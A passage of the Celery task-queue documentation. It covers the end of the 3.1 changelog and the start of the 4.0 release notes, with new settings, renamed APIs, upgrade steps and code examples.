groups: ``worker`` and ``task``. A dispatcher instantiated as follows: .. code-block:: pycon >>> app.events.Dispatcher(connection, groups=['worker']) will only send worker related events and silently drop any attempts to send events related to any other group. - New :setting:`BROKER_FAILOVER_STRATEGY` setting. This setting can be used to change the transport fail-over strategy, can either be a callable returning an iterable or the name of a Kombu built-in failover strategy. Default is "round-robin". Contributed by Matt Wise. - ``Result.revoke`` will no longer wait for replies. You can add the ``reply=True`` argument if you really want to wait for responses from the workers. - Better support for link and link_error tasks for chords. Contributed by Steeve Morin. - Worker: Now emits warning if the :setting:`CELERYD_POOL` setting is set to enable the eventlet/gevent pools. The `-P` option should always be used to select the eventlet/gevent pool to ensure that the patches are applied as early as possible. If you start the worker in a wrapper (like Django's :file:`manage.py`) then you must apply the patches manually, for example by creating an alternative wrapper that monkey patches at the start of the program before importing any other modules. - There's a now an 'inspect clock' command which will collect the current logical clock value from workers. - `celery inspect stats` now contains the process id of the worker's main process. Contributed by Mher Movsisyan. - New remote control command to dump a workers configuration. Example: .. code-block:: console $ celery inspect conf Configuration values will be converted to values supported by JSON where possible. Contributed by Mher Movsisyan. - New settings :setting:`CELERY_EVENT_QUEUE_TTL` and :setting:`CELERY_EVENT_QUEUE_EXPIRES`. These control when a monitors event queue is deleted, and for how long events published to that queue will be visible. Only supported on RabbitMQ. - New Couchbase result backend. This result backend enables you to store and retrieve task results using `Couchbase`_. 
  See :ref:`conf-couchbase-result-backend` for more information about configuring this result backend.

  Contributed by Alain Masiero.

  .. _`Couchbase`: https://www.couchbase.com

- CentOS init-script now supports starting multiple worker instances.

  See the script header for details.

  Contributed by Jonathan Jordan.

- ``AsyncResult.iter_native`` now sets default interval parameter to 0.5.

  Fix contributed by Idan Kamara.

- New setting :setting:`BROKER_LOGIN_METHOD`.

  This setting can be used to specify an alternate login method for the AMQP transports.

  Contributed by Adrien Guinet.

- The ``dump_conf`` remote control command will now give the string representation for types that aren't JSON compatible.

- Function `celery.security.setup_security` is now :func:`@setup_security`.

- Task retry now propagates the message expiry value (Issue #980).

  The value is forwarded as is, so the expiry time won't change.
  To update the expiry time you'd have to pass a new expires argument to ``retry()``.

- Worker now crashes if a channel error occurs.

  Channel errors are transport specific and are the exceptions listed in ``Connection.channel_errors``.
  For RabbitMQ this means that Celery will crash if the equivalence check for one of the queues in :setting:`CELERY_QUEUES` fails, which makes sense since this is a scenario where manual intervention is required.

- Calling ``AsyncResult.get()`` on a chain now propagates errors for previous tasks (Issue #1014).

- The parent attribute of ``AsyncResult`` is now reconstructed when using JSON serialization (Issue #1014).

- Worker disconnection logs are now logged with severity warning instead of error.

  Contributed by Chris Adams.

- ``events.State`` no longer crashes when it receives unknown event types.

- SQLAlchemy Result Backend: New :setting:`CELERY_RESULT_DB_TABLENAMES` setting can be used to change the name of the database tables used.

  Contributed by Ryan Petrello.

- SQLAlchemy Result Backend: Now calls ``engine.dispose`` after fork (Issue #1564).

  If you create your own SQLAlchemy engines then you must also make sure that these are closed after fork in the worker:

  .. code-block:: python

      from multiprocessing.util import register_after_fork

      from sqlalchemy import create_engine

      engine = create_engine(*engine_args)
      register_after_fork(engine, engine.dispose)

- A stress test suite for the Celery worker has been written.

  This is located in the ``funtests/stress`` directory in the git repository.
  There's a README file there to get you started.

- The logger named ``celery.concurrency`` has been renamed to ``celery.pool``.

- New command line utility ``celery graph``.

  This utility creates graphs in GraphViz dot format.

  You can create graphs from the currently installed bootsteps:

  .. code-block:: console

      # Create graph of currently installed bootsteps in both the worker
      # and consumer name-spaces.
      $ celery graph bootsteps | dot -T png -o steps.png

      # Graph of the consumer name-space only.
      $ celery graph bootsteps consumer | dot -T png -o consumer_only.png

      # Graph of the worker name-space only.
      $ celery graph bootsteps worker | dot -T png -o worker_only.png

  Or graphs of workers in a cluster:
  .. code-block:: console

      # Create graph from the current cluster
      $ celery graph workers | dot -T png -o workers.png

      # Create graph from a specified list of workers
      $ celery graph workers nodes:w1,w2,w3 | dot -T png -o workers.png

      # also specify the number of threads in each worker
      $ celery graph workers nodes:w1,w2,w3 threads:2,4,6

      # …also specify the broker and backend URLs shown in the graph
      $ celery graph workers broker:amqp:// backend:redis://

      # …also specify the max number of workers/threads shown (wmax/tmax),
      # enumerating anything that exceeds that number.
      $ celery graph workers wmax:10 tmax:3

- Changed the way that app instances are pickled.

  Apps can now define a ``__reduce_keys__`` method that's used instead of the old ``AppPickler`` attribute.
  For example, if your app defines a custom 'foo' attribute that needs to be preserved when pickling you can define a ``__reduce_keys__`` as such:

  .. code-block:: python

      import celery

      class Celery(celery.Celery):

          def __init__(self, *args, **kwargs):
              super(Celery, self).__init__(*args, **kwargs)
              self.foo = kwargs.get('foo')

          def __reduce_keys__(self):
              # include the custom attribute in the keys used to
              # reconstruct the app when unpickling.
              keys = super(Celery, self).__reduce_keys__()
              keys.update(foo=self.foo)
              return keys

  This is a much more convenient way to add support for pickling custom attributes.
  The old ``AppPickler`` is still supported but its use is discouraged and we would like to remove it in a future version.

- Ability to trace imports for debugging purposes.

  The :envvar:`C_IMPDEBUG` environment variable can be set to trace imports as they occur:

  .. code-block:: console

      $ C_IMPDEBUG=1 celery worker -l info

  .. code-block:: console

      $ C_IMPDEBUG=1 celery shell

- Message headers now available as part of the task request.

  Example adding and retrieving a header value:

  .. code-block:: python

      @app.task(bind=True)
      def t(self):
          return self.request.headers.get('sender')

      >>> t.apply_async(headers={'sender': 'George Costanza'})

- New :signal:`before_task_publish` signal dispatched before a task message is sent and can be used to modify the final message fields (Issue #1281).
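  A minimal sketch of such a handler (the header name and value are invented for the example, and messages without a headers mapping are simply skipped):

  .. code-block:: python

      from celery.signals import before_task_publish

      @before_task_publish.connect
      def stamp_origin(sender=None, headers=None, **kwargs):
          # 'sender' is the name of the task being published; 'headers'
          # is the mutable mapping of message headers about to be sent.
          if headers is not None:
              headers['x-origin'] = 'webapp-1'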
- New :signal:`after_task_publish` signal replaces the old :signal:`task_sent` signal.

  The :signal:`task_sent` signal is now deprecated and shouldn't be used.

- New :signal:`worker_process_shutdown` signal is dispatched in the prefork pool child processes as they exit.

  Contributed by Daniel M Taub.

- ``celery.platforms.PIDFile`` renamed to :class:`celery.platforms.Pidfile`.

- MongoDB Backend: Can now be configured using a URL.

- MongoDB Backend: No longer using deprecated ``pymongo.Connection``.

- MongoDB Backend: Now disables ``auto_start_request``.

- MongoDB Backend: Now enables ``use_greenlets`` when eventlet/gevent is used.

- ``subtask()`` / ``maybe_subtask()`` renamed to ``signature()``/``maybe_signature()``.

  Aliases still available for backwards compatibility.

- The ``correlation_id`` message property is now automatically set to the id of the task.

- The task message ``eta`` and ``expires`` fields now include timezone information.

- All result backends' ``store_result``/``mark_as_*`` methods must now accept a ``request`` keyword argument.

- Events now emit a warning if the broken ``yajl`` library is used.

- The :signal:`celeryd_init` signal now takes an extra keyword argument: ``option``.

  This is the mapping of parsed command line arguments, and can be used to prepare new preload arguments (``app.user_options['preload']``).

- New callback: :meth:`@on_configure`.

  This callback is called when an app is about to be configured (a configuration key is required).

- Worker: No longer forks on :sig:`HUP`.

  This means that the worker will reuse the same pid for better support with external process supervisors.

  Contributed by Jameel Al-Aziz.

- Worker: The log message ``Got task from broker …`` was changed to ``Received task …``.

- Worker: The log message ``Skipping revoked task …`` was changed to ``Discarding revoked task …``.

- Optimization: Improved performance of ``ResultSet.join_native()``.

  Contributed by Stas Rudakou.

- The :signal:`task_revoked` signal now accepts a new ``request`` argument (Issue #1555).

  The revoked signal is dispatched after the task request is removed from the stack, so it must instead use the :class:`~celery.worker.request.Request` object to get information about the task.

- Worker: New :option:`-X <celery worker -X>` command line argument to exclude queues (Issue #1399).

  The :option:`-X <celery worker -X>` argument is the inverse of the :option:`-Q <celery worker -Q>` argument and accepts a list of queues to exclude (not consume from):

  .. code-block:: console

      # Consume from all queues in CELERY_QUEUES, but not the 'foo' queue.
      $ celery worker -A proj -l info -X foo

- Adds :envvar:`C_FAKEFORK` environment variable for simple init-script/:program:`celery multi` debugging.

  This means that you can now do:

  .. code-block:: console

      $ C_FAKEFORK=1 celery multi start 10

  or:

  .. code-block:: console

      $ C_FAKEFORK=1 /etc/init.d/celeryd start

  to avoid the daemonization step to see errors that aren't visible due to missing stdout/stderr.

  A ``dryrun`` command has been added to the generic init-script that enables this option.

- New public API to push and pop from the current task stack: :func:`celery.app.push_current_task` and :func:`celery.app.pop_current_task`.

- ``RetryTaskError`` has been renamed to :exc:`~celery.exceptions.Retry`.

  The old name is still available for backwards compatibility.

- New semi-predicate exception :exc:`~celery.exceptions.Reject`.

  This exception can be raised to ``reject``/``requeue`` the task message, see :ref:`task-semipred-reject` for examples.

- Semipredicates documented: (Retry/Ignore/Reject).

.. _v310-removals:

Scheduled Removals
==================

- The ``BROKER_INSIST`` setting and the ``insist`` argument to ``~@connection`` are no longer supported.

- The ``CELERY_AMQP_TASK_RESULT_CONNECTION_MAX`` setting is no longer supported.

  Use :setting:`BROKER_POOL_LIMIT` instead.

- The ``CELERY_TASK_ERROR_WHITELIST`` setting is no longer supported.

  You should set the :class:`~celery.utils.mail.ErrorMail` attribute of the task class instead.

  You can also do this using :setting:`CELERY_ANNOTATIONS`:

  .. code-block:: python

      from celery import Celery
      from celery.utils.mail import ErrorMail

      class MyErrorMail(ErrorMail):
          whitelist = (KeyError, ImportError)

          def should_send(self, context, exc):
              return isinstance(exc, self.whitelist)

      app = Celery()
      app.conf.CELERY_ANNOTATIONS = {
          '*': {
              'ErrorMail': MyErrorMail,
          }
      }

- Functions that create broker connections no longer support the ``connect_timeout`` argument.

  This can now only be set using the :setting:`BROKER_CONNECTION_TIMEOUT` setting.
  This is because functions no longer create connections directly, but instead get them from the connection pool.

- The ``CELERY_AMQP_TASK_RESULT_EXPIRES`` setting is no longer supported.

  Use :setting:`CELERY_TASK_RESULT_EXPIRES` instead.

.. _v310-deprecations:

Deprecation Time-line Changes
=============================

See the :ref:`deprecation-timeline`.

.. _v310-fixes:

Fixes
=====

- AMQP Backend: join didn't convert exceptions when using the json serializer.
- Non-abstract task classes are now shared between apps (Issue #1150).

  Note that non-abstract task classes shouldn't be used in the new API.
  You should only create custom task classes when you use them as a base class in the ``@task`` decorator.

  This fix ensures backwards compatibility with older Celery versions, so that non-abstract task classes work even if a module is imported multiple times and the app is therefore instantiated multiple times.

- Worker: Workaround for Unicode errors in logs (Issue #427).

- Task methods: ``.apply_async`` now works properly if args list is None (Issue #1459).

- Eventlet/gevent/solo/threads pools now properly handle :exc:`BaseException` errors raised by tasks.

- :control:`autoscale` and :control:`pool_grow`/:control:`pool_shrink` remote control commands will now also automatically increase and decrease the consumer prefetch count.

  Fix contributed by Daniel M. Taub.

- ``celery control pool_`` commands didn't coerce string arguments to int.

- Redis/Cache chords: Callback result is now set to failure if the group disappeared from the database (Issue #1094).

- Worker: Now makes sure that the shutdown process isn't initiated more than once.

- Programs: :program:`celery multi` now properly handles both ``-f`` and ``--logfile`` options (Issue #1541).

.. _v310-internal:

Internal changes
================

- Module ``celery.task.trace`` has been renamed to :mod:`celery.app.trace`.

- Module ``celery.concurrency.processes`` has been renamed to :mod:`celery.concurrency.prefork`.

- Classes that no longer fall back to using the default app:

  - Result backends (:class:`celery.backends.base.BaseBackend`)
  - :class:`celery.worker.WorkController`
  - :class:`celery.worker.Consumer`
  - :class:`celery.worker.request.Request`

  This means that you have to pass a specific app when instantiating these classes.

- ``EventDispatcher.copy_buffer`` renamed to :meth:`@events.Dispatcher.extend_buffer`.

- Removed unused and never documented global instance ``celery.events.state.state``.

- :class:`@events.Receiver` is now a :class:`kombu.mixins.ConsumerMixin` subclass.

- :class:`celery.apps.worker.Worker` has been refactored as a subclass of :class:`celery.worker.WorkController`.

  This removes a lot of duplicate functionality.

- The ``Celery.with_default_connection`` method has been removed in favor of ``with app.connection_or_acquire`` (:meth:`@connection_or_acquire`).

- The ``celery.results.BaseDictBackend`` class has been removed and is replaced by :class:`celery.results.BaseBackend`.

.. _whatsnew-4.0:

===========================================
 What's new in Celery 4.0 (latentcall)
===========================================

:Author: Ask Solem (``ask at celeryproject.org``)

.. sidebar:: Change history

    What's new documents describe the changes in major versions, we also have a :ref:`changelog` that lists the changes in bugfix releases (0.0.x), while older series are archived under the :ref:`history` section.

Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system.

It's a task queue with focus on real-time processing, while also supporting task scheduling.
Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. This version is officially supported on CPython 2.7, 3.4, and 3.5. and also supported on PyPy. .. _`website`: http://celeryproject.org/ .. topic:: Table of Contents Make sure you read the important notes before upgrading to this version. .. contents:: :local: :depth: 3 Preface ======= Welcome to Celery 4! This is a massive release with over two years of changes. Not only does it come with many new features, but it also fixes a massive list of bugs, so in many ways you could call it our "Snow Leopard" release. The next major version of Celery will support Python 3.5 only, where we are planning to take advantage of the new asyncio library. This release would not have been possible without the support of my employer, `Robinhood`_ (we're hiring!). - Ask Solem Dedicated to Sebastian "Zeb" Bjørnerud (RIP), with special thanks to `Ty Wilkins`_, for designing our new logo, all the contributors who help make this happen, and my colleagues at `Robinhood`_. .. _`Ty Wilkins`: http://tywilkins.com .. _`Robinhood`: https://robinhood.com Wall of Contributors -------------------- Aaron McMillin, Adam Chainz, Adam Renberg, Adriano Martins de Jesus, Adrien Guinet, Ahmet Demir, Aitor Gómez-Goiri, Alan Justino, Albert Wang, Alex Koshelev, Alex Rattray, Alex Williams, Alexander Koshelev, Alexander Lebedev, Alexander Oblovatniy, Alexey Kotlyarov, Ali Bozorgkhan, Alice Zoë Bevan–McGregor, Allard Hoeve, Alman One, Amir Rustamzadeh, Andrea Rabbaglietti, Andrea Rosa, Andrei Fokau, Andrew Rodionoff, Andrew Stewart, Andriy Yurchuk, Aneil Mallavarapu, Areski Belaid, Armenak Baburyan, Arthur Vuillard, Artyom Koval, Asif Saifuddin Auvi, Ask Solem, Balthazar Rouberol, Batiste Bieler, Berker Peksag, Bert Vanderbauwhede, Brendan Smithyman, Brian Bouterse, Bryce Groff, Cameron Will, ChangBo Guo, Chris Clark, Chris Duryee, Chris Erway, Chris Harris, Chris Martin, Chillar Anand, Colin McIntosh, Conrad Kramer, Corey Farwell, Craig Jellick, Cullen Rhodes, Dallas Marlow, Daniel Devine, Daniel Wallace, Danilo Bargen, Davanum Srinivas, Dave Smith, David Baumgold, David Harrigan, David Pravec, Dennis Brakhane, Derek Anderson, Dmitry Dygalo, Dmitry Malinovsky, Dongweiming, Dudás Ádám, Dustin J. Mitchell, Ed Morley, Edward Betts, Éloi Rivard, Emmanuel Cazenave, Fahad Siddiqui, Fatih Sucu, Feanil Patel, Federico Ficarelli, Felix Schwarz, Felix Yan, Fernando Rocha, Flavio Grossi, Frantisek Holop, Gao Jiangmiao, George Whewell, Gerald Manipon, Gilles Dartiguelongue, Gino Ledesma, Greg Wilbur, Guillaume Seguin, Hank John, Hogni Gylfason, Ilya Georgievsky, Ionel Cristian Mărieș, Ivan Larin, James Pulec, Jared Lewis, Jason Veatch, Jasper Bryant-Greene, Jeff Widman, Jeremy Tillman, Jeremy Zafran, Jocelyn Delalande, Joe Jevnik, Joe Sanford, John Anderson, John Barham, John Kirkham, John Whitlock, Jonathan Vanasco, Joshua Harlow, João Ricardo, Juan Carlos Ferrer, Juan Rossi, Justin Patrin, Kai Groner, Kevin Harvey, Kevin Richardson, Komu Wairagu, Konstantinos Koukopoulos, Kouhei Maeda, Kracekumar Ramaraju, Krzysztof Bujniewicz, Latitia M. 
Haskins, Len Buckens, Lev Berman, lidongming, Lorenzo Mancini, Lucas Wiman, Luke Pomfrey, Luyun Xie, Maciej Obuchowski, Manuel Kaufmann, Marat Sharafutdinov, Marc Sibson, Marcio Ribeiro, Marin Atanasov Nikolov, Mathieu Fenniak, Mark Parncutt, Mauro Rocco, Maxime Beauchemin, Maxime Vdb, Mher Movsisyan, Michael Aquilina, Michael Duane Mooring, Michael Permana, Mickaël Penhard, Mike Attwood, Mitchel Humpherys, Mohamed Abouelsaoud, Morris Tweed, Morton Fox, Môshe van der Sterre, Nat Williams, Nathan Van Gheem, Nicolas Unravel, Nik Nyby, Omer Katz, Omer Korner, Ori Hoch, Paul Pearce, Paulo Bu, Pavlo Kapyshin, Philip Garnero, Pierre Fersing, Piotr Kilczuk, Piotr Maślanka, Quentin Pradet, Radek Czajka, Raghuram Srinivasan, Randy Barlow, Raphael Michel, Rémy Léone, Robert Coup, Robert Kolba, Rockallite Wulf, Rodolfo Carvalho, Roger Hu, Romuald Brunet, Rongze Zhu, Ross Deane, Ryan Luckie, Rémy Greinhofer, Samuel Giffard, Samuel Jaillet, Sergey Azovskov, Sergey Tikhonov, Seungha Kim, Simon Peeters, Spencer E. Olson, Srinivas Garlapati, Stephen Milner, Steve Peak, Steven Sklar, Stuart Axon, Sukrit Khera, Tadej Janež, Taha Jahangir, Takeshi Kanemoto, Tayfun Sen, Tewfik Sadaoui, Thomas French, Thomas Grainger, Tomas Machalek, Tobias Schottdorf, Tocho Tochev, Valentyn Klindukh, Vic Kumar, Vladimir Bolshakov, Vladimir Gorbunov, Wayne Chang, Wieland Hoffmann, Wido den Hollander, Wil Langford, Will Thompson, William King, Yury Selivanov, Vytis Banaitis, Zoran Pavlovic, Xin Li, 許邱翔, :github_user:`allenling`, :github_user:`alzeih`, :github_user:`bastb`, :github_user:`bee-keeper`, :github_user:`ffeast`, :github_user:`firefly4268`, :github_user:`flyingfoxlee`, :github_user:`gdw2`, :github_user:`gitaarik`, :github_user:`hankjin`, :github_user:`lvh`, :github_user:`m-vdb`, :github_user:`kindule`, :github_user:`mdk`:, :github_user:`michael-k`, :github_user:`mozillazg`, :github_user:`nokrik`, :github_user:`ocean1`, :github_user:`orlo666`, :github_user:`raducc`, :github_user:`wanglei`, :github_user:`worldexception`, :github_user:`xBeAsTx`. .. note:: This wall was automatically generated from git history, so sadly it doesn't not include the people who help with more important things like answering mailing-list questions. Upgrading from Celery 3.1 ========================= Step 1: Upgrade to Celery 3.1.25 -------------------------------- If you haven't already, the first step is to upgrade to Celery 3.1.25. This version adds forward compatibility to the new message protocol, so that you can incrementally upgrade from 3.1 to 4.0. Deploy the workers first by upgrading to 3.1.25, this means these workers can process messages sent by clients using both 3.1 and 4.0. After the workers are upgraded you can upgrade the clients (e.g. web servers). Step 2: Update your configuration with the new setting names ------------------------------------------------------------ This version radically changes the configuration setting names, to be more consistent. The changes are fully backwards compatible, so you have the option to wait until the old setting names are deprecated, but to ease the transition we have included a command-line utility that rewrites your settings automatically. See :ref:`v400-upgrade-settings` for more information. Step 3: Read the important notes in this document ------------------------------------------------- Make sure you are not affected by any of the important upgrade notes mentioned in the following section. 
An especially important note is that Celery now checks the arguments you send to a task by matching it to the signature (:ref:`v400-typing`). Step 4: Upgrade to Celery 4.0 ----------------------------- At this point you can upgrade your workers and clients with the new version. .. _v400-important: Important Notes =============== Dropped support for Python 2.6 ------------------------------ Celery now requires Python 2.7 or later, and also drops support for Python 3.3 so supported versions are: - CPython 2.7 - CPython 3.4 - CPython 3.5 - PyPy 5.4 (``pypy2``) - PyPy 5.5-alpha (``pypy3``) Last major version to support Python 2 -------------------------------------- Starting from Celery 5.0 only Python 3.5+ will be supported. To make sure you're not affected by this change you should pin the Celery version in your requirements file, either to a specific version: ``celery==4.0.0``, or a range: ``celery>=4.0,<5.0``. Dropping support for Python 2 will enable us to remove massive amounts of compatibility code, and going with Python 3.5 allows us to take advantage of typing, async/await, asyncio, and similar concepts there's no alternative for in older versions. Celery 4.x will continue to work on Python 2.7, 3.4, 3.5; just as Celery 3.x still works on Python 2.6. Django support -------------- Celery 4.x requires Django 1.8 or later, but we really recommend using at least Django 1.9 for the new ``transaction.on_commit`` feature. A common problem when calling tasks from Django is when the task is related to a model change, and you wish to cancel the task if the transaction is rolled back, or ensure the task is only executed after the changes have been written to the database. ``transaction.atomic`` enables you to solve this problem by adding the task as a callback to be called only when the transaction is committed. Example usage: .. code-block:: python from functools import partial from django.db import transaction from .models import Article, Log from .tasks import send_article_created_notification def create_article(request): with transaction.atomic(): article = Article.objects.create(**request.POST) # send this task only if the rest of the transaction succeeds. transaction.on_commit(partial( send_article_created_notification.delay, article_id=article.pk)) Log.objects.create(type=Log.ARTICLE_CREATED, object_pk=article.pk) Removed features ---------------- - Microsoft Windows is no longer supported. The test suite is passing, and Celery seems to be working with Windows, but we make no guarantees as we are unable to diagnose issues on this platform. If you are a company requiring support on this platform, please get in touch. - Jython is no longer supported. Features removed for simplicity ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Webhook task machinery (``celery.task.http``) has been removed. Nowadays it's easy to use the :pypi:`requests` module to write webhook tasks manually. We would love to use requests but we are simply unable to as there's a very vocal 'anti-dependency' mob in the Python community If you need backwards compatibility you can simply copy + paste the 3.1 version of the module and make sure it's imported by the worker: https://github.com/celery/celery/blob/3.1/celery/task/http.py - Tasks no longer sends error emails. This also removes support for ``app.mail_admins``, and any functionality related to sending emails. - ``celery.contrib.batches`` has been removed. This was an experimental feature, so not covered by our deprecation timeline guarantee. 
You can copy and pase the existing batches code for use within your projects: https://github.com/celery/celery/blob/3.1/celery/contrib/batches.py Features removed for lack of funding ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We announced with the 3.1 release that some transports were moved to experimental status, and that there'd be no official support for the transports. As this subtle hint for the need of funding failed we've removed them completely, breaking backwards compatibility. - Using the Django ORM as a broker is no longer supported. You can still use the Django ORM as a result backend: see :ref:`django-celery-results` section for more information. - Using SQLAlchemy as a broker is no longer supported. You can still use SQLAlchemy as a result backend. - Using CouchDB as a broker is no longer supported. You can still use CouchDB as a result backend. - Using IronMQ as a broker is no longer supported. - Using Beanstalk as a broker is no longer supported. In addition some features have been removed completely so that attempting to use them will raise an exception: - The ``--autoreload`` feature has been removed. This was an experimental feature, and not covered by our deprecation timeline guarantee. The flag is removed completely so the worker will crash at startup when present. Luckily this flag isn't used in production systems. - The experimental ``threads`` pool is no longer supported and has been removed. - The ``force_execv`` feature is no longer supported. The ``celery worker`` command now ignores the ``--no-execv``, ``--force-execv``, and the ``CELERYD_FORCE_EXECV`` setting. This flag will be removed completely in 5.0 and the worker will raise an error. - The old legacy "amqp" result backend has been deprecated, and will be removed in Celery 5.0. Please use the ``rpc`` result backend for RPC-style calls, and a persistent result backend for multi-consumer results. We think most of these can be fixed without considerable effort, so if you're interested in getting any of these features back, please get in touch. **Now to the good news**... New Task Message Protocol ------------------------- .. :sha:`e71652d384b1b5df2a4e6145df9f0efb456bc71c` This version introduces a brand new task message protocol, the first major change to the protocol since the beginning of the project. The new protocol is enabled by default in this version and since the new version isn't backwards compatible you have to be careful when upgrading. The 3.1.25 version was released to add compatibility with the new protocol so the easiest way to upgrade is to upgrade to that version first, then upgrade to 4.0 in a second deployment. If you wish to keep using the old protocol you may also configure the protocol version number used: .. code-block:: python app = Celery() app.conf.task_protocol = 1 Read more about the features available in the new protocol in the news section found later in this document. .. _v400-upgrade-settings: Lowercase setting names ----------------------- In the pursuit of beauty all settings are now renamed to be in all lowercase and some setting names have been renamed for consistency. This change is fully backwards compatible so you can still use the uppercase setting names, but we would like you to upgrade as soon as possible and you can do this automatically using the :program:`celery upgrade settings` command: .. 
code-block:: console $ celery upgrade settings proj/settings.py This command will modify your module in-place to use the new lower-case names (if you want uppercase with a "``CELERY``" prefix see block below), and save a backup in :file:`proj/settings.py.orig`. .. _latentcall-django-admonition: .. admonition:: For Django users and others who want to keep uppercase names If you're loading Celery configuration from the Django settings module then you'll want to keep using the uppercase names. You also want to use a ``CELERY_`` prefix so that no Celery settings collide with Django settings used by other apps. To do this, you'll first need to convert your settings file to use the new consistent naming scheme, and add the prefix to all Celery related settings: .. code-block:: console $ celery upgrade settings proj/settings.py --django After upgrading the settings file, you need to set the prefix explicitly in your ``proj/celery.py`` module: .. code-block:: python app.config_from_object('django.conf:settings', namespace='CELERY') You can find the most up to date Django Celery integration example here: :ref:`django-first-steps`. .. note:: This will also add a prefix to settings that didn't previously have one, for example ``BROKER_URL`` should be written ``CELERY_BROKER_URL`` with a namespace of ``CELERY`` ``CELERY_BROKER_URL``. Luckily you don't have to manually change the files, as the :program:`celery upgrade settings --django` program should do the right thing. The loader will try to detect if your configuration is using the new format, and act accordingly, but this also means you're not allowed to mix and match new and old setting names, that's unless you provide a value for both alternatives. The major difference between previous versions, apart from the lower case names, are the renaming of some prefixes, like ``celerybeat_`` to ``beat_``, ``celeryd_`` to ``worker_``. The ``celery_`` prefix has also been removed, and task related settings from this name-space is now prefixed by ``task_``, worker related settings with ``worker_``. Apart from this most of the settings will be the same in lowercase, apart from a few special ones: ===================================== ========================================================== **Setting name** **Replace with** ===================================== ========================================================== ``CELERY_MAX_CACHED_RESULTS`` :setting:`result_cache_max` ``CELERY_MESSAGE_COMPRESSION`` :setting:`result_compression`/:setting:`task_compression`. 
``CELERY_TASK_RESULT_EXPIRES`` :setting:`result_expires` ``CELERY_RESULT_DBURI`` :setting:`result_backend` ``CELERY_RESULT_ENGINE_OPTIONS`` :setting:`database_engine_options` ``-*-_DB_SHORT_LIVED_SESSIONS`` :setting:`database_short_lived_sessions` ``CELERY_RESULT_DB_TABLE_NAMES`` :setting:`database_db_names` ``CELERY_ACKS_LATE`` :setting:`task_acks_late` ``CELERY_ALWAYS_EAGER`` :setting:`task_always_eager` ``CELERY_ANNOTATIONS`` :setting:`task_annotations` ``CELERY_MESSAGE_COMPRESSION`` :setting:`task_compression` ``CELERY_CREATE_MISSING_QUEUES`` :setting:`task_create_missing_queues` ``CELERY_DEFAULT_DELIVERY_MODE`` :setting:`task_default_delivery_mode` ``CELERY_DEFAULT_EXCHANGE`` :setting:`task_default_exchange` ``CELERY_DEFAULT_EXCHANGE_TYPE`` :setting:`task_default_exchange_type` ``CELERY_DEFAULT_QUEUE`` :setting:`task_default_queue` ``CELERY_DEFAULT_RATE_LIMIT`` :setting:`task_default_rate_limit` ``CELERY_DEFAULT_ROUTING_KEY`` :setting:`task_default_routing_key` ``-"-_EAGER_PROPAGATES_EXCEPTIONS`` :setting:`task_eager_propagates` ``CELERY_IGNORE_RESULT`` :setting:`task_ignore_result` ``CELERY_TASK_PUBLISH_RETRY`` :setting:`task_publish_retry` ``CELERY_TASK_PUBLISH_RETRY_POLICY`` :setting:`task_publish_retry_policy` ``CELERY_QUEUES`` :setting:`task_queues` ``CELERY_ROUTES`` :setting:`task_routes` ``CELERY_SEND_TASK_SENT_EVENT`` :setting:`task_send_sent_event` ``CELERY_TASK_SERIALIZER`` :setting:`task_serializer` ``CELERYD_TASK_SOFT_TIME_LIMIT`` :setting:`task_soft_time_limit` ``CELERYD_TASK_TIME_LIMIT`` :setting:`task_time_limit` ``CELERY_TRACK_STARTED`` :setting:`task_track_started` ``CELERY_DISABLE_RATE_LIMITS`` :setting:`worker_disable_rate_limits` ``CELERY_ENABLE_REMOTE_CONTROL`` :setting:`worker_enable_remote_control` ``CELERYD_SEND_EVENTS`` :setting:`worker_send_task_events` ===================================== ========================================================== You can see a full table of the changes in :ref:`conf-old-settings-map`. Json is now the default serializer ---------------------------------- The time has finally come to end the reign of :mod:`pickle` as the default serialization mechanism, and json is the default serializer starting from this version. This change was :ref:`announced with the release of Celery 3.1 `. If you're still depending on :mod:`pickle` being the default serializer, then you have to configure your app before upgrading to 4.0: .. code-block:: python task_serializer = 'pickle' result_serializer = 'pickle' accept_content = {'pickle'} The Json serializer now also supports some additional types: - :class:`~datetime.datetime`, :class:`~datetime.time`, :class:`~datetime.date` Converted to json text, in ISO-8601 format. - :class:`~decimal.Decimal` Converted to json text. - :class:`django.utils.functional.Promise` Django only: Lazy strings used for translation etc., are evaluated and conversion to a json type is attempted. - :class:`uuid.UUID` Converted to json text. You can also define a ``__json__`` method on your custom classes to support JSON serialization (must return a json compatible type): .. code-block:: python class Person: first_name = None last_name = None address = None def __json__(self): return { 'first_name': self.first_name, 'last_name': self.last_name, 'address': self.address, } The Task base class no longer automatically register tasks ---------------------------------------------------------- The :class:`~@Task` class is no longer using a special meta-class that automatically registers the task in the task registry. 
Instead this is now handled by the :class:`@task` decorators. If you're still using class based tasks, then you need to register these manually: .. code-block:: python class CustomTask(Task): def run(self): print('running') CustomTask = app.register_task(CustomTask()) The best practice is to use custom task classes only for overriding general behavior, and then using the task decorator to realize the task: .. code-block:: python @app.task(bind=True, base=CustomTask) def custom(self): print('running') This change also means that the ``abstract`` attribute of the task no longer has any effect. .. _v400-typing: Task argument checking ---------------------- The arguments of the task are now verified when calling the task, even asynchronously: .. code-block:: pycon >>> @app.task ... def add(x, y): ... return x + y >>> add.delay(8, 8) >>> add.delay(8) Traceback (most recent call last): File "", line 1, in File "celery/app/task.py", line 376, in delay return self.apply_async(args, kwargs) File "celery/app/task.py", line 485, in apply_async check_arguments(*(args or ()), **(kwargs or {})) TypeError: add() takes exactly 2 arguments (1 given) You can disable the argument checking for any task by setting its :attr:`~@Task.typing` attribute to :const:`False`: .. code-block:: pycon >>> @app.task(typing=False) ... def add(x, y): ... return x + y Or if you would like to disable this completely for all tasks you can pass ``strict_typing=False`` when creating the app: .. code-block:: python app = Celery(..., strict_typing=False) Redis Events not backward compatible ------------------------------------ The Redis ``fanout_patterns`` and ``fanout_prefix`` transport options are now enabled by default. Workers/monitors without these flags enabled won't be able to see workers with this flag disabled. They can still execute tasks, but they cannot receive each others monitoring messages. You can upgrade in a backward compatible manner by first configuring your 3.1 workers and monitors to enable the settings, before the final upgrade to 4.0: .. code-block:: python BROKER_TRANSPORT_OPTIONS = { 'fanout_patterns': True, 'fanout_prefix': True, } Redis Priorities Reversed 